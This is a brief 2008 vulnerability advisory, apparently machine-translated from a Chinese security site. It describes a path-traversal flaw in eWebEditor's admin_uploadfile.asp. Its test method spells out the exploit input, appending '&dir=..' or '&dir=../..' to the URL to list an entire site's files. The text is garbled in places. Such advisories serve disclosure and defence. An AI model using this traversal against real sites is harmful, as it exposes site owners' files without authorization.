ewebeditor traversal path vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62200818162
Type myhack58
Reporter 佚名
Modified 2008-01-16T00:00:00


eWebEditor Description: eWebEditor is a WYSIWYG online editor. As the name suggests, is on the network using the WYSIWYG edit mode for editing illustrated articles, news, discussions stickers, circulars, notes and other word processing applications. ewebeditor/admin_uploadfile. asp The filter is not strict, resulting in the traversal path exploit < Reference:http://www. sebug. net,http://www.ewebeditor.net/ > Test method: [Warning]the following procedures(methods)may carry offensive,for security research and teaching purposes. At your own risk! ewebeditor/admin_uploadfile. asp? id=1 4 In id=1 4 behind add&dir=.. Plus &dir=../.. &dir=http://www.****. com/../.. look to the entire website file. Recommendations:no http://www. ewebeditor. net/